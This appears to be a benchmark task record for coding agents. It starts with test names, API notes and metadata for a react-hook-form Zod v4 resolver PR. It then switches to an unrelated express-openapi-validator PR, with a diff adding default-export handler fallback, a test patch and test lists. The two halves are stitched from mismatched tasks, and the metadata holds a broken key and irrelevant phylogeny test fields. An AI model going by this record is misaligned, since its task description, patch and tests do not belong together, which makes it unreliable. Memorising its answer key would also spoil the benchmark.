"yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "yup/src/__tests__/yup.ts > yupResolver > should correctly infer the output type from a yup schema", "yup/src/__tests__/yup.ts > yupResolver > should correctly infer the output type from a yup schema using a transform", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should throw any error unrelated to TypeSchema", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should correctly infer the output type from a typeschema schema", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should correctly infer the output type from a typeschema schema using a transform", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should correctly infer the output type from a typeschema schema when a different input type is specified", "zod/src/__tests__/zod-v3.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod-v3.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod-v3.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod-v3.ts > zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", "zod/src/__tests__/zod-v3.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod-v3.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod-v3.ts > zodResolver > should throw any error unrelated to Zod", 
"zod/src/__tests__/zod-v3.ts > zodResolver > should enforce parse params type signature", "zod/src/__tests__/zod-v3.ts > zodResolver > should correctly infer the output type from a zod schema", "zod/src/__tests__/zod-v3.ts > zodResolver > should correctly infer the output type from a zod schema using a transform", "zod/src/__tests__/zod-v3.ts > zodResolver > should correctly infer the output type from a zod schema when a different input type is specified", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants without errors", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants with errors", "valibot/src/__tests__/valibot.ts > valibotResolver > should correctly infer the output type from a valibot schema", "valibot/src/__tests__/valibot.ts > valibotResolver > should correctly infer the output type from a valibot schema using a transform", "valibot/src/__tests__/Form.tsx > form's 
validation with Valibot and TypeScript's integration", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "typebox/src/__tests__/typebox.ts > typeboxResolver > should correctly infer the output type from a typebox schema", "typebox/src/__tests__/typebox.ts > typeboxResolver > should correctly infer the output type from a typebox schema with TypeCompiler", "typebox/src/__tests__/typebox.ts > typeboxResolver > should correctly infer the output type from a typebox schema using a transform", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return values when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Valibot", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation with Superstruct", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "vine/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", 
"ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when validation fails", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "fluentvalidation-ts/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when some properties are undefined", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message for all validation failures", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized error message when requirement fails", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true", 
"arktype/src/__tests__/arktype.ts > arktypeResolver > should correctly infer the output type from a arktype schema", "arktype/src/__tests__/arktype.ts > arktypeResolver > should correctly infer the output type from a arktype schema using a transform", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "joi/src/__tests__/Form.tsx > form's validation with Joi and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when requirement fails", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when walidation fails", "joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with 
`validateAllFieldCriteria` set to true", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should correctly infer the output type from a io-ts schema", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should correctly infer the output type from a io-ts schema using a transform", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return values from effectTsResolver when validation pass", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return a single error from effectTsResolver when validation fails", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return the first error from effectTsResolver when validation fails with `validateAllFieldCriteria` set to firstError", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return all the errors from effectTsResolver when validation fails with `validateAllFieldCriteria` set to true", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should correctly infer the output type from a effectTs schema", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should correctly infer the output type from a effectTs schema using a transform", "fluentvalidation-ts/src/__tests__/Form-native-validation.tsx > form's native validation with fluentvalidation-ts", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Typebox", "typebox/src/__tests__/Form-native-validation-compiler.tsx > form's native validation with Typebox (with compiler)", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when some properties are undefined", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Arktype", 
"ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when requirement fails", "standard-schema/src/__tests__/Form-native-validation.tsx > form's native validation with arkType", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "typebox/src/__tests__/Form-compiler.tsx > form's validation with Typebox (with compiler) and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when walidation fails", "nope/src/__tests__/Form-native-validation.tsx > form's native validation with Nope", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when some properties are undefined", "io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts", "effect-ts/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "effect-ts/src/__tests__/Form-native-validation.tsx > form's native validation with effect-ts", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver when validation pass", 
"fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver with `mode: sync` when validation pass", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver with `mode: sync` when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver when validation pass & raw=true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with names option", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array", "src/__tests__/toNestErrors.ts > ensures consistent ordering when a field array has a root error and an error in the non-first element", "src/__tests__/toNestErrors.ts > should correctly validate object with special characters", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should 
return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > 
classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "nope/src/__tests__/Form.tsx > 
form's validation with Yup and TypeScript's integration", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should validate with success", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "vine/src/__tests__/Form.tsx > form's validation with Vine and TypeScript's integration", "typebox/src/__tests__/Form.tsx > form's validation with Typebox and TypeScript's integration", "standard-schema/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration" ]
Function: zodResolver(schema: Zod3Type<Output, Input>, schemaOptions?: Zod3ParseParams, resolverOptions?: { mode?: 'async'|'sync'; raw?: false }) Location: zod/src/zod.ts Inputs: - **schema** – Zod v3 schema (`z3.ZodSchema`) whose generic `<Output, Input>` describe the parsed output and raw input types. - **schemaOptions** – Optional parse‑options object matching `z3.ParseParams` (or a fallback shape for pre‑3.25 versions) such as `async`, `path`, `errorMap`, etc. - **resolverOptions** – Optional resolver configuration; `mode` selects `'async'` (default) or `'sync'`; `raw` defaults to `false`. Outputs: `Resolver<Input, Context, Output>` – a resolver that validates the form values and returns the parsed Zod output (`Output`) when validation succeeds, otherwise a `ResolverError` with nested field errors. Description: Creates a React‑Hook‑Form resolver that validates form data using a Zod v3 schema. When `raw` is true the original values are returned; otherwise the transformed Zod output is returned. Function: zodResolver(schema: Zod3Type<Output, Input>, schemaOptions?: Zod3ParseParams, resolverOptions: { mode?: 'async'|'sync'; raw: true }) Location: zod/src/zod.ts Inputs: - Same as above, but **resolverOptions.raw** is required to be `true`. Outputs: `Resolver<Input, Context, Input>` – a resolver that returns the original unparsed input values on successful validation. Description: Variant of the Zod v3 resolver that forces the raw form values to be returned even if the schema performs transforms. Function: zodResolver<T extends z4.$ZodType<Output, Input>>(schema: T, schemaOptions?: Zod4ParseParams, resolverOptions?: { mode?: 'async'|'sync'; raw?: false }) Location: zod/src/zod.ts Inputs: - **schema** – Zod v4 schema (`z4.$ZodType`) with generic `<Output, Input>`. - **schemaOptions** – Optional parse‑options matching Zod v4 `ParseContext` (or a fallback shape) such as `jitless`, `reportInput`, `error`. 
- **resolverOptions** – Optional resolver configuration; `mode` selects `'async'` (default) or `'sync'`; `raw` defaults to `false`. Outputs: `Resolver<z4.input<T>, Context, z4.output<T>>` – a resolver that validates using the Zod v4 schema and returns the parsed output type (`z4.output<T>`). Description: Provides a resolver for Zod v4 schemas, preserving transformed output types while supporting async or sync validation modes. Function: zodResolver<T extends z4.$ZodType<Output, Input>>(schema: T, schemaOptions?: Zod4ParseParams, resolverOptions: { mode?: 'async'|'sync'; raw: true }) Location: zod/src/zod.ts Inputs: - Same as above, with **resolverOptions.raw** forced to `true`. Outputs: `Resolver<z4.input<T>, Context, z4.input<T>>` – a resolver that returns the raw input values from a Zod v4 schema, ignoring any schema transforms. Description: Variant of the Zod v4 resolver that forces the raw form values to be returned, useful when the consumer wants untransformed data.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 5, "num_modified_lines": 234, "pr_author": "colinhacks", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/colinhacks/zod/issues/4371" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding Zod 4 support to the resolver, describing the version bump, subpath imports, and compatibility expectations. The provided test patch updates imports and adds comprehensive v3 and v4 test suites that directly verify the new behavior, so the tests align with the stated requirements. No signals of test suite coupling, implicit naming, missing specs, or external undocumented dependencies are present. Therefore the task is a well‑specified feature implementation and qualifies as SOLVABLE (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8db56ae0dd4062a0a3becb5b36203fa929b835b5
2021-11-28 10:48:35
cdimascio: @zzgab thanks. This looks good. Please add the tsignore and I’ll get this merged zzgab: Updated. Thanks.
cdimascio__express-openapi-validator-675
diff --git a/src/resolvers.ts b/src/resolvers.ts index 7d7445f..68dd21b 100644 --- a/src/resolvers.ts +++ b/src/resolvers.ts @@ -33,18 +33,16 @@ export function defaultResolver( const modulePath = path.join(handlersPath, baseName); if (!tmpModules[modulePath]) { tmpModules[modulePath] = require(modulePath); - if (!tmpModules[modulePath][oId]) { - // if oId is not found only module, try the module's default export - tmpModules[modulePath] = tmpModules[modulePath].default; - } } - if (!tmpModules[modulePath][oId]) { + + const handler = tmpModules[modulePath][oId] || tmpModules[modulePath].default; + + if (!handler) { throw Error( - `Could not find 'x-eov-operation-handler' with id ${oId} in module '${modulePath}'. Make sure operation '${oId}' defined in your API spec exists as a handler function in '${modulePath}'.`, + `Could not find 'x-eov-operation-handler' with id ${oId} in module '${modulePath}'. Make sure operation '${oId}' defined in your API spec exists as a handler function (or module has a default export) in '${modulePath}'.`, ); } - const handler = tmpModules[modulePath][oId]; cache[cacheKey] = handler; return handler; }
#671 default export in handler Hi, issue #671 I wasn't sure whether to add the `x-eov-operation-handler` optional property in `OperationObject` interface (since it has an important meaning in the program). If you think it does not belong, we could instead use a `// @ts-ignore` comment in my new test before line 21. Thanks
**Title** Support default export handlers in operation resolver **Problem** The resolver could not locate a handler when a module used a default export, leading to missing‐handler errors at runtime. Existing error messages did not clarify the default export case. **Root Cause** The resolver overwrote the required module with its default export and only checked for a named handler, preventing proper fallback to the default export. **Fix / Expected Behavior** - Resolve a handler by first looking for the named operation identifier, then falling back to the module’s default export. - Preserve the original module object to avoid losing other exports. - Throw a clear error when neither a named handler nor a default export is found, mentioning both possibilities. - Maintain existing caching behavior for resolved handlers. **Risk & Validation** - Verify that existing named‑export handlers continue to work unchanged. - Add tests covering modules that export a handler as default and confirm they are resolved correctly. - Ensure the updated error message is triggered only when no handler is present.
675
cdimascio/express-openapi-validator
diff --git a/test/default-export.spec.ts b/test/default-export.spec.ts new file mode 100644 index 0000000..6b4cd2f --- /dev/null +++ b/test/default-export.spec.ts @@ -0,0 +1,46 @@ +import * as express from 'express'; +import * as OpenApiValidator from '../src'; +import { expect } from 'chai'; +import * as request from 'supertest'; +import * as path from 'path'; + +describe('default export resolver', () => { + let server = null; + let app = express(); + + before(async () => { + app.use( + OpenApiValidator.middleware({ + apiSpec: { + openapi: '3.0.0', + info: { version: '1.0.0', title: 'test bug OpenApiValidator' }, + paths: { + '/': { + get: { + operationId: 'anything', + // @ts-ignore + 'x-eov-operation-handler': 'controller-with-default', + responses: { 200: { description: 'home api' } } + } + }, + }, + }, + operationHandlers: path.join(__dirname, 'resources'), + }), + ); + + server = app.listen(3000); + console.log('server start port 3000'); + }); + + after(async () => server.close()); + + it('should use default export operation', async () => { + return request(app) + .get(`/`) + .expect(200) + .then((r) => { + expect(r.body).to.have.property('success').that.equals(true); + }); + }); +}); diff --git a/test/resources/controller-with-default.ts b/test/resources/controller-with-default.ts new file mode 100644 index 0000000..b52090a --- /dev/null +++ b/test/resources/controller-with-default.ts @@ -0,0 +1,3 @@ +export default function (req, res) { + res.json({success: true}).end(); +}
[ "should use default export operation" ]
[ "create campaign should return 201", "create campaign should return 400", "create campaign should return 200", "should return 200", "should return 201", "does not mutate the API specification", "does not validate responses which are not present in the spec", "should allow additional / unknown properties properties", "should return 400 on missing required prop (when using additional props explode object)", "should return 400 if additionalProperties=false, and type is invalid", "should return 400 if additionalProperties=false, but extra props sent", "should return 200 if additonalProperities=true and extra props are sent", "should not validate schema for requests since schema is validated on startup", "should not validate schema for response since schema is validated on startup", "should not validate schema for preprocessor since schema is validated on startup", "should not validate schema for multipar since schema is validated on startup", "should set serdes deserialize", "should set serdes serialize", "should set serdes serialize and deserialize", "should set serdes serialize and deserialize separately", "should validate allOf", "should fail validation due to missing required id field", "should fail validation due to missing required name field", "adds \"Allow\" header to 405 - Method Not Allowed", "should validate circular ref successfully", "should return 400 since is_cat is passed as string not boolean", "should return 400 when age is passed as string, but number is expected", "should return 400 when age (number) is null", "should return 200 when all are typed correctly", "should keep is_cat as boolean", "should return 400 when is_cat requires string type \"true\", but boolean specified", "should handle components.parameter $refs", "should match wildcard type */*", "should match wildcard type application/*", "should null if no accept specified", "should match media type if charset is not specified in accepts", "should match media type if charset is specified 
in accepts, but charset not defined in schema", "should return 200 if testDateTimeProperty is provided with invalid, but correctly formatted date time and default validation is enabled (past compatibility)", "should return 400 if testDateTimeProperty is provided with incorrectly formatted date time and default validation enabled (past compatibility)", "should return 200 if testDateTimeProperty is provided with incorrectly formatted date time and format validation disabled", "should return 200 if testDateTimeProperty is provided with valid date time and full validation enabled", "should return 400 if testDateTimeProperty is provided with invalid date time and full validation enabled", "should throw 400 if servers are empty and request is malformed", "should be able to use an endpoint with some nested paths $ref", "should be able to use an endpoint with some nested paths $ref 2", "should handle float type with negative", "should handle float type with 0 value", "should handle float type with positive value", "should require the query parameter number_id has 3 digits", "should require the query parameter string_id has 3 letters", "should return success if the query parameter string_id has 3 letters", "should return 400 missing required header", "should return 400 invalid required header", "should return 200 for valid headers", "should throw 400 if required header is missing", "should find appropriate request body in spec by contentType with charset (compatibility)", "should find appropriate request body in spec by contentType with charset", "should match mediatype when charset case does not match the case defined in the spec", "should be an instance of BadRequest", "should be an instance of InternalServerError", "should be an instance of UnsupportedMediaType", "should be an instance of RequestEntityTooLarge", "should be an instance of MethodNotAllowed", "should be an instance of NotFound", "should be an instance of Unauthorized", "should be an instance of Forbidden", 
"should ignore path and return 200, rather than validate", "should not ignore path and return 404", "should validate a path within the base path that is not ignored", "should validate a route defined in openapi but not express with invalid params", "should return 404 if route is defined in openapi but not express and params are valid", "should propagate spec errors when validateApiSpec is true", "should fail gracefully when validateApiSpec is false", "should throw 400 when required multipart file field", "should throw 400 when required form field is missing during multipart upload", "should validate x-www-form-urlencoded form_pa and and form_p2", "should throw 405 get method not allowed", "should throw 415 unsupported media type", "should return 400 when improper range specified", "should validate a request body with a schemaObject $ref", "should validate a requestBody $ref", "should validate a requestBody $ref that contains a schemaObject $ref", "should validate application/octet-stream file and metadata", "should validate multipart file and metadata", "should fail, because response does not satisfy schema", "should pass if /components is not present", "should allow null to be set (name: nullable true)", "should not fill an explicity null with default when coerceTypes is false", "should fill unspecified field with default when coerceTypes is false", "should fail if required and not provided (nullable true)", "should fail if required and not provided (nullable false", "should fail if required and provided as null when nullable is false", "should allow nullable object", "should not coerce a nullable int", "should return 200 for dog", "should return 200 for cat and populate default color", "should return 400 for dog with cat props", "should return 400 a bad discriminator", "should return 200 for puppy", "should return 200 for cat", "should return 200 for kitty", "should return 200 for Dog", "should return 200 for Cat", "should return 200 one first oneOf option", 
"should return 200 one second oneOf option", "should return 400 for invalid oneOf option", "should return 200 on first oneOf (b) option", "should return 200 on second oneOf (b) option", "should return 400 for invalid oneOf (b) option", "post type anyOf (without readonly id) should pass", "post type oneOf (without readonly id) should pass", "post type anyof without providing the single required readonly property should pass", "should fail if posting anyof with bad discriminator", "should throw 400 on missing required query parameter", "should respond with json on proper get call", "should return 400 with unknown query parameter", "should return 400 when non-urlencoded JSON in query param", "should return 200 when JSON in query param", "should return 400 when improper JSON in query param", "should return 400 when comma separated array in query param", "should return 400 when comma separated array in query param is not url encoded", "should return 200 when separated array in query param", "should return 400 when improper separated array in query param", "should return 200 when array explode in query param", "should return 400 when improper array explode in query param", "should return 400 if required body is missing", "should return 400 if required \"name\" property is missing", "should return 200 when post props are met", "should not validate a route defined in express, but not under an openapi basepath", "should return 400 if route is defined in openapi but not express and is called with invalid parameters", "should return 404 if route is defined in swagger but not express", "should throw 404 on a route defined in express, but not documented in the openapi spec", "should return 405 if route is defined in swagger but not express and the method is invalid", "should return 404 for route not defined in openapi or express", "should return 404 for a route defined in express, but not documented in openapi", "should return 415 when media type is not supported", "should 
return 405 when method is not allows", "should return 400 when path param should be int, but instead is string", "should return 400 an invalid enum value is given", "should handle multiple path params with coereion", "should return 200 and get the id from the response", "should not install handlers when nothing provided", "should use the default handler when string provided", "can use a custom operation resolver", "should recognize mapped operation", "create document should return 201", "create document should return 201 with empty body", "return 415", "should return 400 if pathLevel query parameter is not provided", "should return 400 if operationLevel query parameter is not provided", "should return 400 if neither operationLevel, nor pathLevel query parameters are provided", "should return 200 if both pathLevel and operationLevel query parameter are provided", "should match on users test", "static routes should be matched before dynamic routes", "should url decode path parameters (type level)", "should url decode path parameters (path level)", "should handle path parameter with style=simple", "should handle :'s in path parameters", "should sort dynamic leafs after static leafs", "should sort dynamic inner paths after static inner paths", "should pass if known query params are specified", "should not fail if unknown query param is specified", "should fail if operation overrides x-allow-unknown-query-parameters=false", "should reject any query param when endpoint declares none", "should return 200 if no query params are supplied", "should fail if unknown query param is specified", "should return 200 if operation overrides x-allow-unknown-query-parameters=true", "should not allow empty query param value", "should allow empty query param value with allowEmptyValue: true", "should succeed when query param 'name' has empty value and sets allowEmptyValue: true", "should not allow reserved characters", "should may allow reserved characters when allowedReserved: true", 
"should not allow read only properties in requests", "should allow read only properties in responses", "should not allow read only inlined properties in requests", "should not allow read only properties in requests (nested schema $refs)", "should not allow read only properties in requests (deep nested schema $refs)", "should pass validation if required read only properties to be missing from request ($ref)", "should pass validation if required read only properties to be missing from request (inlined)", "should pass validation if required read only properties to be missing from request (with charset)", "should fail validation if required read only properties is missing from the response", "should require readonly required property in response", "should return 500 if readonly required property is missing from response", "should return 415 for undeclared media type", "should return 200 if text/plain request body is satisfied", "should return 200 if text/html request body is satisfied by */*", "should return 200 if application/ld+json request body is satisfied by application/*", "should return 200 if application/vnd.api+json; type=two request body is validated agains the corrent schema", "should return 400 if testProperty body property is not provided", "should return 200 if testProperty body property is provided", "should return 400 if array is passed (instead of object) and the array includes an object that meets requirements", "should return 200 if a json suffex is used for content-type", "should return 500 if additional response body property is returned", 